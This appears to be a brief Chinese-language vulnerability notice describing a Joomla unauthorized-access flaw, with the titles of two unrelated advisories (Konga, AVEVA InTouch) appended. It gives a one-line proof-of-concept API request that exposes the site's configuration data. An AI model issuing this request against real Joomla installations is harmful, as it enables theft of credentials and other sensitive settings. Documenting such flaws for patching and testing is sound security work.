Joomla 存在未授权访问漏洞,攻击者通过覆盖 public 值绕过限制,访问部分API获取敏感数据
登陆页面
验证POC
/api/index.php/v1/config/application?public=true
Konga 普通用户越权获取管理员权限漏洞 AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854